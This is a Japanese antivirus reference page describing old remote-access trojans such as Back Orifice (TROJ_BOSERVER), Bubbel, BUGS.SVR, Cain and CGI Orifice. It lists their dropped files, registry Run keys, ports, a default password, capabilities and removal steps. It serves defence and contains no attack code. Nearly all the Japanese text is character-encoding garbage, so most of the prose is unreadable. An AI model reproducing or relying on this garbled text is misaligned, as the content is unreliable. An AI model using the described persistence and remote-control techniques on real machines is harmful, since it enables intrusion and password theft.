¡¦HTTP¥×¥í¥È¥³¥ë¤Î¥µ¥Ý¡¼¥È¤ÈWeb¥µ¡¼¥Ð¾ðÊó¤Î¼èÆÀ¡£¤³¤ì ¤Ë¤è¤ê¥Ö¥é¥¦¥¶·Ðͳ¤Ç¥¢¥¯¥»¥¹¤¬¹Ô¤¨¤ë ¡¦²»À¼¥Õ¥¡¥¤¥ë¤Î¼Â¹Ô ¡¦¥­¡¼¥Ü¡¼¥ÉÆþÎÏÆâÍÆ¤Îµ­Ï¿¤ÈÁ÷¿® ¡¡°ì¸Ä¤Î¥×¥í¥°¥é¥à¤Ê¤Î¤Ç¶î½ü¤Ï¹Ô¤¨¤Þ¤»¤ó¡£¥Õ¥¡¥¤¥ëºï ½ü¤ò¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤¡£ ¡¡ ¡¡

TROJ_BOSERVER


̾¡¡¡¡¾Î:TROJ_BOSERVER

ÊÌ¡¡¡¡Ì¾:BACKORIFICE.TROJAN, BOCLIENT_TROJAN, TROJ_
BOCLIENT
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¡Ý¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£¥È¥í¥¤¤ÎÌÚÇÏ¥×¥í¥° ¥é¥à¤ÏľÀÜ¥·¥¹¥Æ¥à¤ËÇ˲õ³èư¤ò¹Ô¤¦¤¬¡¢´¶À÷³èư¤Ï¹Ô¤ï ¤Ê¤¤¡£ ¡ÝTROJ_BOSERVER¤Î¥×¥í¥°¥é¥à¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢.. \Windows\System¥Ç¥£¥ì¥¯¥È¥ê¤ÎÃæ¤Ë¼«Ê¬¼«¿È¤ÎÊ£À½¤È" windll.dll"¤È¤¤¤ëŽ¡¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ëŽ¡(¤³¤Î"windll. dll"¤Ïޤ"TROJ_BOWINDLL"¤È¤¤¤¦Ì¾¾Î¤Ç¸¡½Ð¤µ¤ì¤ëŽ¡) -¡¡¤³¤Î¤È¤­Ž¤¥Þ¥·¥óµ¯Æ°»þ¤ËËè²ó¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë ¤è¤¦¤Ë¡¢¥ì¥¸¥¹¥È¥ê¤Ø¥×¥í¥°¥é¥à¤òÅÐÏ¿¤¹¤ë¡£¤³¤ì¤Ë¤è¤êޤ ¥Þ¥·¥ó¤òµ¯Æ°¤¹¤ëÅ٤ˎ¤ "TROJ_BOSERVER"¤¬¼Â¹Ô¤µ¤ì¤ëŽ¡¼Â¹ÔÃæ¤Ï¥Õ¥¡¥¤¥ë¤Îºï½ü¤Ï ¤Ç¤­¤Ê¤¤Ž¡ -¡¡¤³¤ÎTROJ_BOSERVER¥×¥í¥°¥é¥à¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤ ¤ë¥Þ¥·¥ó¤ÏޤTROJ_BOCLIENT¤ò»È¤Ã¤Æ¥ê¥â¡¼¥È¤Ç¥Õ¥ë¥¢¥¯¥» ¥¹¤¹¤ë¤³¤È¤¬²Äǽ¤Ë¤Ê¤ëŽ¡
¾É¾õ:
¡Ý¥æ¡¼¥¶¡¼¤¬¤³¤Î¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤·¤ÆBOSERVER¤Î¥¤¥ó¥¹¥È ¡¼¥ë¤ËÀ®¸ù¤·¤¿¾ì¹ç¡¢TROJ_BOCLIENT¤ò»ý¤Ä¿Í¤Ëޤ¥æ¡¼¥¶ ¡¼¥Þ¥·¥ó¤ÎIP¥¢¥É¥ì¥¹¤ÈPORTÈÖ¹æ ¤¬Á÷¤é¤ì¤ë¡£¤½¤Î¤¿¤á¡¢¥ê¥â¡¼¥È¥¢¥¯¥»¥¹¤Ë¤è¤ê¡Ö¥Õ¥¡¥¤ ¥ë¤Ë¥¢¥¯¥»¥¹¤¹¤ë¡×¡Ö¥Ñ¥¹¥ï¡¼¥É¤òÅð¤à¡×¡Ö¥Þ¥·¥ó¤ò¥·¥ã ¥Ã¥È¥À¥¦¥ó¤¹¤ë¡×¤È¤¤¤Ã¤¿Áàºî¤¬¾¡¼ê¤Ë¹Ô¤ï¤ì¤ë²ÄǽÀ­¤¬ ¤¢¤ëŽ¡ - Windows\system\¥Ç¥£¥ì¥¯¥È¥ê¤ÎÃæ¤ËÊ£À½¥Õ¥¡¥¤¥ë¤È" windll.dll"¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬ºîÀ®¤µ¤ì¤ëŽ¡
È÷¡¡¡¡¹Í:¡¡¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤Î̾Á°¤Ë¤ÏޤBoclient.
exe¡¢Boserver.exe(124928byte)¡¢stalk.exe¤¬³Îǧ¤µ¤ì¤Æ ¤¤¤Þ¤¹¡£
¢£ÂнèÊýË¡:
­¡¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼¤òºï½ü¤¹¤ë¡£ \\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunServices ¤ËTROJ_BOSERVER/CLIENT¤Î¥Õ¥¡¥¤¥ë¤¬ÅÐÏ¿¤µ¤ì¤Æ¤¤¤ë¤Î¤Çޤ ¤½¤Î¥­¡¼¤òºï½ü¤¹¤ëŽ¡ ­¢¥Þ¥·¥ó¤òºÆµ¯Æ°¤¹¤ë¡£ ­£TROJ_BOSERVER/CLIENT¤Î¥×¥í¥°¥é¥à¥Õ¥¡¥¤¥ë¤òºï½ü¤¹ ¤ë¡£

TROJ_BOSNIFF


̾¡¡¡¡¾Î:TROJ_BOSNIFF

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:¡Ý¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£¥È¥í¥¤¤Î
ÌÚÇÏ¥×¥í¥°¥é¥à¤ÏľÀÜ¥·¥¹¥Æ¥à¤ËÇ˲õ³èư¤ò¹Ô¤¦¤¬¡¢´¶À÷ ³èư¤Ï¹Ô¤ï¤Ê¤¤¡£ ¡Ý¡¡TROJ_BOSNIFF¤ÏŽ¤Æ±¤¸¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤ÎTROJ_ BOCLINET¤ÈTROJ_BOSERVER¤ò¥Þ¥·¥ó¤«¤é½üµî¤¹¤ë¤³¤È¤òÌÜŪ ¤Ëºî¤é¤ì¤¿¤â¤Î¤È ¤·¤Æ·öÅÁ¤µ¤ìÇÛÉÛ¤µ¤ì¤¿¡£¤·¤«¤·TROJ_BOSNIFF¤Ïޤ¼Â¤Ï¤³¤ì ¼«ÂΤ¬¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤È¤·¤ÆÆ°ºî¤¹¤ëŽ¡ ¡Ý¡¡Ç˲õ³èư¤ÏTROJ_BOCLINET¤ÈTROJ_BOSERVER¤ÈÁ´¤¯Æ±¤¸ ¤Ç¤¢¤ëŽ¡TROJ_BOCLINET¤ÈTROJ_BOSERVER¤Ïޤ°­°Õ¤¢¤ë¼Ô¤¬¥ê ¥â¡¼¥È¥¢¥¯¥»¥¹¤Ë¤è¤Ã¤Æ¤¢¤Ê¤¿¤Î¥Þ¥·¥ó¤Ë¥Õ¥ë¥¢¥¯¥»¥¹¤ò ²Äǽ¤Ë¤·Ž¤¥ì¥¸¥¹¥È¥ê¤ò²þÊѤ·¤¿¤êޤ¥Ñ¥¹¥ï¡¼¥É¤äIP¥¢¥É¥ì ¥¹¤ò¼èÆÀ¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¤¹¤ë¥Í¥Ã¥È¥ï¡¼¥¯·¿Ç˲õ ¥Ä¡¼¥ë¤Ç¤¢¤ëŽ¡
È÷¡¡¡¡¹Í:¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾:Bosniff.exe(231ޤ068
bytes)

TROJ_BOWINDLL


̾¡¡¡¡¾Î:TROJ_BOWINDLL

ÊÌ¡¡¡¡Ì¾:BACKORIFICE.TROJAN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:8ޤ192¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:-¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ë"
TROJ_BOSERVER"¤ò¼Â¹Ô¤·¤¿ºÝ¤ËºîÀ®¤µ¤ì¤ë¥Õ¥¡¥¤¥ë" windll.dll"¤Ç¤¢¤ëŽ¡ -¤³¤Î¥Õ¥¡¥¤¥ëñÂΤǤÏ̵³²¤Ç¤¢¤ë¤¬Ž¤"TROJ_BOSERVER"¤¬¼Â ¹Ô¤µ¤ì¤Æ¤¤¤ë´Ö¤Ïޤ¤³¤Î¥Õ¥¡¥¤¥ë¤òºï½ü¤¹¤ë¤³¤È¤¬¤Ç¤­¤Ê¤¤ Ž¡
È÷¡¡¡¡¹Í:"TROJ_BOSERVER"¤Þ¤¿¤Ï"TROJ_BOCLIENT"¤ò»²¾ÈŽ¡

TROJ_BUBBEL


̾¡¡¡¡¾Î:TROJ_BUBBEL

ÊÌ¡¡¡¡Ì¾:BACKDOOR.BUBBEL, BUBBEL.CLI, TROJ/BUBBEL

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:81,408 bytes

¾Ü¡¡¡¡ºÙ:ÇÛ¤é¤ì¤Æ¤¤¤ë¼ÂºÝ¤Î¥×¥í¥°¥é¥à¤Ï ¼«¸Ê²òÅà·Á¼°
¤ÎZip°µ½Ì¥Õ¥¡¥¤¥ë¤Ç¡¢¤³¤ì¤ò²òÅह¤ë¤È¡¢ BUBBEL.THE ¤È BUBBEL.SCK BUBBEL.EXE ¡¢ BUBBEL.BBL ¡¢ BUBBEL.BL ¤¬ ºîÀ®¤µ¤ì¤ë¡£ ¤½¤ì¤ÏƱ¤¸¤¯¥Í¥Ã¥È¥ï¡¼¥¯µ¡Ç½¤Î¥¿¥¹¥¯¤Ë ´Ø¤·¤ÆÀÕǤ¤¬¤¢¤ë¤Ç¤¢¤í¤¦¥À¥¤¥Ê¥ß¥Ã¥¯¥ê¥ó¥¯¡¦¥é¥¤¥Ö¥é ¥ê¥Õ¥¡¥¤¥ë SHLWAPI.DLL ¤òɬÍפȤ¹¤ë¡£ ¡¡°Ê²¼¤Î¤è¤¦¤Ê¥·¥¹¥Æ¥à¤Ë¤Ä¤¤¤Æ¤Î¿¤¯¤Î¥¤¥ó¥Õ¥©¥á¡¼¥·
¥ç¥ó¤òÆÀ¤ë¤³¤È¤¬¤Ç¤­¤ë:
¡¦¡¡¡¡¥ª¥Ú¥ì¡¼¥Æ¥£¥ó¥°¡¦¥·¥¹¥Æ¥à̾ ¡¦¡¡¡¡Windows ¥Ð¡¼¥¸¥ç¥ó ¡¦¡¡¡¡¥æ¡¼¥¶Ì¾ ¡¦¡¡¡¡Windows ¡¢¥·¥¹¥Æ¥à¤È¥Æ¥ó¥Ý¥é¥ê¥Õ¥¡¥¤¥ë¤Î¥Ç¥£¥ì ¥¯¥È¥ê¥Ñ¥¹ ¡¦¡¡¡¡¥­¡¼¥Ü¡¼¥É¥¿¥¤¥× ¡¦¡¡¡¡ComputerName¡¦¡¡¡¡£Ã£Ð£Õ¤Î¤Î¿ô¡¡¤È¡¡¥×¥í¥»¥Ã¥µ ¥¿¥¤¥× ¡¦¡¡¡¡´°Á´¤Ê RAM¡¦¡¡¡¡¥Õ¥ê¡¼RAM ¡¦¡¡¡¡»ÈÍÑÃæ¤Î RAM¡¦¡¡¡¡½üµî²Äǽ¤Ê¥É¥é¥¤¥Ö ¡¦¡¡¡¡¸ÇÄꤵ¤ì¤Æ¤¤¤ë¥É¥é¥¤¥Ö ¡¦¡¡¡¡ CDROM - ¥É¥é¥¤¥Ö ¡¦¡¡¡¡RAM ¥É¥é¥¤¥Ö ¡¦¡¡¡¡¥Í¥Ã¥È¥ï¡¼¥¯¡¦¥É¥é¥¤¥Ö ¡¦¡¡¡¡¥·¥¹¥Æ¥àÆüÉÕ ¡¦¡¡¡¡¥·¥¹¥Æ¥à»þ´Ö ¡¦¡¡¡¡¥¯¥ê¥Ã¥×¥Ü¡¼¥ÉÆâÍÆ
¤Þ¤¿¡¢°Ê²¼¤ÎÁàºî¤ò¼Â¹Ô¤Ç¤­¤ë:
¡¦¡¡¡¡¥³¥ó¥Ô¥å¡¼¥¿¤ò¥ê¥Ö¡¼¥È¤¹¤ë ¡¦¡¡¡¡¥·¥ã¥Ã¥È¥À¥¦¥ó¥³¥ó¥Ô¥å¡¼¥¿ ¡¦¡¡¡¡¥Í¥Ã¥È¥ï¡¼¥¯¤«¤é¥æ¡¼¥¶¡¼¤ò¥í¥°¥ª¥Õ¤µ¤»¤ë¡£ ¡¦¡¡¡¡¤¹¤Ù¤Æ¤Î¥¦¥¤¥ó¥É¥¦¤Î¥¿¥¤¥È¥ë¤òɽ¼¨¤·¡¢¼«Í³¤Ë¤½ ¤ì¤é¤òÁàºî¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ ¡¦¡¡¡¡¡Ê¾å¤Î¡Ë¥¦¥¤¥ó¥É¥¦¤Î¥µ¥Ö¥¦¥£¥ó¥É¥¦¤Î¥¿¥¤¥È¥ë¤ò ÆÀ¤ë¡£ ¡¦¡¡¡¡Web ¥µ¡¼¥Ð¤«¤é¥Õ¥¡¥¤¥ë¤ò¥À¥¦¥ó¥í¡¼¥É¤¹¤ë¡¦¡¡¡¡ ¥¹¥¯¥ê¡¼¥ó¥­¥ã¥×¥Á¥ã¤ò¼è¤ê¹þ¤à¡£ ¡¦¡¡¡¡¥Ç¥Õ¥©¥ë¥È¡¦¥×¥ê¥ó¥¿¤Ë¥Õ¥¡¥¤¥ë¤ò¥×¥ê¥ó¥È¤¹¤ë¡¦ ¡¡¡¡¥Ñ¥¹¥ï¡¼¥É¤òÊѹ¹¤¹¤ë¡£¥Ñ¥¹¥ï¡¼¥É¤Ï¾®Ê¸»ú¤Ç ¡Ö passwd bubbelisreleased ¡×¤ËÊѹ¹¤µ¤ì¤ë¤À¤í¤¦ ¡¦¡¡¡¡ ¥³¥ó¥Ô¥å¡¼¥¿¡¼¤¬µ¯Æ°¤·¤¿»þ´Ö¤«¤é·Ð²á¤·¤¿ ¤ò¥Ç ¥£¥¹¥×¥ì¥¤¤Ëɽ¼¨ ¡¦¡¡¡¡¥Þ¥¦¥¹¤ò¾¡¼ê¤ËÁàºî¤¹¤ë ¡¦¡¡¡¡ÆâÉôÀܳ¤È¤Î¥Ý¡¼¥ÈÈÖ¹æ¤òÊѹ¹¤¹¤ë ¡¦¡¡¡¡CD¡ÝROM¥É¥é¥¤¥Ö¤Î³«ÊÄ¡¦¡¡¡¡¥­¡¼¥¹¥È¥í¡¼¥¯¤ò Éà ´Ö³Ö¤Çµ­Ï¿¤¹¤ë¡£ ¡¦¡¡¡¡¥á¥Ã¥»¡¼¥¸¡Ê messagebox ¡Ë¤¹¤ë¤³¤È¤ò¼¨¤·¤Ê¤µ ¤¤¡£¡¦¡¡¡¡¥Õ¥¡¥¤¥ë¤ò±ÜÍ÷¤¹¤ë¡£ ¡¦¡¡¡¡¥·¥¹¥Æ¥à¥×¥í¥»¥¹¤ò½ªÎ»¤µ¤»¤ë ¡¦¡¡¡¡¤É¤ó¤Ê¥×¥í¥°¥é¥à / ¥Ç¥£¥¹¥×¥ì¥¤ ¥Õ¥¡¥¤¥ë / ¥á ¥Ç¥£¥¢¤Ç¤â¼Â¹Ô¤Ç¤­¤ë ¤³¤Î¥×¥í¥°¥é¥à¤Ï°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ËÃͤòÅÐÏ¿¤· ¤Æ¡¢¥·¥¹¥Æ¥à¤Îµ¯Æ°»þ¤Ëɬ¤º¤³¤Î¥¦¥¤¥ë¥¹¤¬¼Â¹Ô¤µ¤ì¤ë¤è ¤¦¤ËÀßÄꤹ¤ë¡£ HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\
CurrentVersion\Runservices¡ÉWindows¡É="c:\windows\
system\bubbel.exe" ¤Þ¤¿¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ËÃͤòÄɲ乤롣 HKEY_LOCAL_MACHINE\SOFTWARE\bubbel\config
ÃÍ¡¡:"Password" = "Y9YY1I"¡Ê¤Ä¤Þ¤ê¥Ñ¥¹¥ï¡¼¥É¤Ï"
bubbel"¡Ë ²¼µ­¤ÎÃͤâÄɲ䵤ì¤ë¡£ "Port" =¡¡ ¡É5000¡É °Ê²¼¤Î¥Õ¥¡¥¤¥ë¤òwindows\system ¥Ç¥£¥ì¥¯¥È¥ê¤ËºîÀ®¤·¡¢
¤µ¤é¤Ë¥ê¥Í¡¼¥à¤¹¤ë:
bubbel.bbl => msvbvm50.dll bubbel.bl_ => msinet.ocx bubbel.the => bubbel.exe bubbel.sck => mswinsck.ocx _ ¤¹¤Ù¤Æ¤Î½àÈ÷¤¬À°¤¦¤È¡¢ Telnet ¤Î¤è¤¦¤Ê¥µ¡¼¥É¥Ñ¡¼¥Æ¥£ ¡¼¥×¥í¥°¥é¥à¤ò»È¤¦¤³¤È¤òÄ̤¸¤Æ¡¢¹¶·â¼Ô¤¬»ÈÍѤ¹¤ë¥¯¥é ¥¤¥¢¥ó¥È¦¤Ï¥æ¡¼¥¶¡¼¤Î¥Þ¥·¥ó¤ËÀܳ¤¹¤ë¤³¤È¤¬¤Ç¤­¡¢ÀÜ Â³¤¬³ÎΩ¤¹¤ë¤È¡¢¥¯¥é¥¤¥¢¥ó¥È¤«¤é¤Ï¾å¤Ë¤¢¤²¤¿¤³¤È¤Ê¤é ¤Ê¤ó¤Ç¤â¤Ç¤­¤ë ¥×¥í¥°¥é¥àÆâ¤Ë¤Ï°Ê²¼¤Î¥³¥á¥ó¥È¤¬¤¢¤ë¡£ Thanks to Simon Steed (alias Toto)

TROJ_BUGS.SVR


̾¡¡¡¡¾Î:TROJ_BUGS.SVR

¸À¡¡¡¡¸ì:¥¹¥Ú¥¤¥ó¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows3.1°Ê¾å

ȯ¾ÍÃÏ:ÆîÊÆ

¾Ü¡¡¡¡ºÙ:NetBus¥¦¥¤¥ë¥¹¤äBackOrifice¥¦¥¤¥ë¥¹¤È»÷¤¿¡¢
¥Í¥Ã¥È¥ï¡¼¥¯¤ò²ð¤·¤Æ¥Ï¥Ã¥­¥ó¥°¤ò¹Ô¤Ê¤¦¥Ä¡¼¥ë¡£ ¼Â¹Ô¤µ¤ì¤¿¥¦¥¤¥ë¥¹ËÜÂΤϡÈSYSTEMTR.EXE¡É¤È¤¤¤¦¥Õ¥¡¥¤
¥ë¤ò:\Windows\System¤ËºîÀ®¤¹¤ë¡£
¤µ¤é¤Ë¡¢°Ê²¼¤Î¤è¤¦¤Ë¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¡£ \HKEY_USERS\Software\Microsoft\Windows\CurrentVersion
\Run\SysTray = ¡È:\WINDOWS\SYSTEM\SYSTEMTR.EXE
¡É ¤³¤ì¤Ë¤è¤ê¡¢¼¡²ó¤ÎWindowsµ¯Æ°»þ¤Ë¡¢¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å ¡¼¥ë¤¬¥·¥¹¥Æ¥à¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤ë¡£ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ï¡¢¡ÉWSOCK32.DLL¡É¤Î¥Í¥Ã¥È¥ï¡¼¥¯Ž¥ ¥×¥í¥È¥³¥ëµ¡Ç½¤òÍøÍѤ·¤Æ¡¢´¶À÷¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Ë³°Éô ¤«¤é¥¢¥¯¥»¥¹¤Ç¤­¤ë¤è¤¦¤Ë¤¹¤ë¡£¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë ¤ÏÆÃÄê¤ÎIP¥¢¥É¥ì¥¹¤ÎPort2115¤ËÀܳ¤¹¤ë¡£ ¤³¤ì¤Ë¤è¤ê¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò¤â¤Ä¥Ï¥Ã¥«¡¼¤Ï¡¢ ´¶À÷¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Î¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤¹¤Ù¤Æ¤Ë¥¢¥¯¥»¥¹ ¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ê¡¢¥·¥¹¥Æ¥àŽ¥¥ì¥¸¥¹¥È¥ê¤òľÀÜ¡¢±ÜÍ÷¤·¡¢ Êѹ¹¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ ¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ÏDDE¡Ê¥¢¥×¥ê¥±¡¼¥·¥ç¥ó´Ö¤Î¥Ç ¡¼¥¿¤Î¤ä¤ê¼è¤ê¡Ë¤òÊѹ¹¤·¡¢´¶À÷¤·¤¿¥³¥ó¥Ô¥å¡¼¥¿¾å¤Ç¥× ¥í¥»¥¹¤òÁö¤é¤»¤ë¤³¤È¤¬¤Ç¤­¤ë¡£
È÷¡¡¡¡¹Í:ËÜÂÎ: 285,184¥Ð¥¤¥È

¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë: 48,128¥Ð¥¤¥È

¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë: 77,824¥Ð¥¤¥È

TROJ_CAIN


̾¡¡¡¡¾Î:TROJ_CAIN

ÊÌ¡¡¡¡Ì¾:CAIN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win9x/NT

¾Ü¡¡¡¡ºÙ:¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¹¡£
¾¤Î¥Õ¥¡¥¤¥ë¤Ø¤Î´¶À÷³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¡£°ì¸Ä¤Î¥×¥í¥°¥é ¥à¤Ê¤Î¤Ç¶î½ü¤Ï¤Ç¤­¤Þ¤»¤ó¡£¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Æ¤¯¤À¤µ ¤¤¡£ ¡¡¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϥѥ¹¥ï¡¼¥É¤òÅð¤à¤³¤È¤òÌÜŪ¤È¤·¤¿ ¥Ï¥Ã¥«¡¼¥Ä¡¼¥ë¤Ç¤¢¤ê¡¢Á´ÂÎŪ¤Ë¤Ï¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¡¢ ¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥¢¥à¡¢DLL¤Î£³¤Ä¤Î¥×¥í¥°¥é¥à¤«¤é¤Ê¤ê ¤Þ¤¹¡£¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤Ïµ¯Æ°¤µ¤ì¤ë¤È¤½¤Î¥Þ¥·¥ó¤Ç»È ÍѤµ¤ì¤¿¥Ñ¥¹¥ï¡¼¥É¤ò¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤ËÁ÷¿®¤·¤Þ ¤¹¡£
È÷¡¡¡¡¹Í:¡¡¸½ºß½Ð²ó¤Ã¤Æ¤¤¤ë¥Õ¥¡¥¤¥ë̾¤È¤·¤Æ¤Ï¥µ¡¼¥Ð
¡¼¥×¥í¥°¥é¥à¤Ï"CAIN.EXE"¡¢¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Ï" ABEL.EXE"¡¢DLL¤Ï"1abel.dll"¤È¤µ¤ì¤Æ¤¤¤ë¤³¤È¤¬Â¿¤¤¤è¤¦ ¤Ç¤¹¡£¤¿¤À¤·¡¢¥×¥í¥°¥é¥à̾¤ÏÊѹ¹¤·¤Æ¤âưºî¤¬²Äǽ¤Ê¤Î ¤Ç¾¤Î¥Õ¥¡¥¤¥ë̾¤Ç¤¢¤Ã¤Æ¤âÃí°Õ¤¬É¬ÍפǤ¹¡£

TROJ_CGI_ORIFICE


̾¡¡¡¡¾Î:TROJ_CGI_ORIFICE

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:336ޤ934¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:1999ǯ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤Î¥¦¥¤¥ë¥¹¤Ï¡¢³°Éô¤«¤é¾¿Í¤ÎPC¤ò´ÉÍý¤Ç
¤­¤ë¤è¤¦¤Ë¤¹¤ë¥³¥ó¥Ô¥å¡¼¥¿¿¯Æþ¥×¥í¥°¥é¥à¤Ç¤¢¤ê¡¢TROJ_ Netbus¤ä TROJ_Boserver(BackOrifice)¤È¤¤¤Ã¤¿¥¦¥¤¥ë¥¹¤Ë¹ó»÷¤·¤Æ ¤¤¤ë¡£TCP/IP¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤ëWindows¾å¡ÊNT¤â´Þ ¤à¡Ë¤Çư¤­¡¢¥¯ ¥é¥¤¥¢¥ó¥È¡¦¥×¥í¥°¥é¥à¤È¥µ¡¼¥Ð¡¼¡¦¥×¥í¥°¥é¥à¤«¤é¹½À® ¤µ¤ì¤ë¡£ ¡¡ - ´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥µ¡¼¥Ð¡¼¡¦¥×¥í¥°¥é¥à¤¬£´ ¤Ä¤Î¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ë¡£¤½¤Î¤¦¤Á£³¤Ä¤Î¥Õ¥¡¥¤¥ë¡¢~win. bak¡Ê336ޤ934¥Ð¥¤¥È¡Ë¡¢ window.exe¡Ê336ޤ934¥Ð¥¤¥È¡Ë¡¢nodll.exe¡Ê32ޤ256¥Ð¥¤ ¥È¡Ë¤ÏWindows¤Î¥Ç¥£¥ì¥¯¥È¥ê¤Ë¡¢¤â¤¦¤Ò¤È¤Ä¤ÎLMDRKI_33. DLL ¡Ê17ޤ408¥Ð¥¤¥È¡Ë¤ÏWindows¤Î¥·¥¹¥Æ¥à¥Ç¥£¥ì¥¯¥È¥ê¤Ëºî¤é ¤ì¤ë¡£¡ÊºÇ½é¤Î£²¤Ä¡¢~win.bak¤Èwindow.exe¤Ï¡¢¤¿¤ó¤Ë¸µ ¤Î¥¦¥¤¥ë¥¹¥³¡¼¥É¤ò¥³¥Ô¡¼ ¤·¤¿¤â¤Î¡£¡Ë ¡¡¥¿¥¹¥¯¥Ð¡¼¤«¤é¥Õ¥¡¥¤¥ë̾¤ò¾Ã¤·¡¢´¶À÷¤òȯ¸«¤µ¤ì¤Å¤é ¤¯¤·¤è¤¦¤È¤¹¤ë¤¬¡¢¥Ö¥é¥ó¥¯¤¬¥¿¥¹¥¯¥Ð¡¼¤Ëɽ¼¨¤µ¤ì¤ë¤¿ ¤á¡¢¤Ê¤Ë¤«¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤Æ¤¤¤ë¤³¤È¤¬¤ï¤«¤ë¡£¥×¥í ¥°¥é ¥à¤Ï¥Ð¥Ã¥¯¥°¥é¥¦¥ó¥É¤Ç¤¿¤¨¤ºÂÔµ¡¤·¤Æ¤ª¤ê¡¢¥¯¥é¥¤¥¢¥ó ¥È¡Ê¥Ï¥Ã¥«¡¼¡Ë¤«¤é¤ÎÌ¿Îá¤òÂԤƤ¤¤ëŽ¡¡¡¤Þ¤¿¡¢Win.ini.Æâ ¤Ë¡ÉRUN=nodll¡É¤È¤¤¤¦¥³¥Þ¥ó¥É¤òÉÕ¤±²Ã¤¨¤ë¡£
»³²:
¡¡¤È¤¯¤ËÇ˲õ³èư¤Ï¤Ê¤¤¡£ ¡¡
È÷¡¡¡¡¹Í:´¶À÷¤òȯ¸«¤·¤¿¤È¤­¤Ï¡¢¥¦¥¤¥ë¥¹¤¬ºîÀ®¤·¤¿4¤Ä
¤Î¥Õ¥¡¥¤¥ë¤ÈWin.ini.Æâ¤Î¥³¥Þ¥ó¥É¡ÉRUN=nodll¡É¤òºï½ü¤· ¤Æ¤¯¤À¤µ¤¤¡£

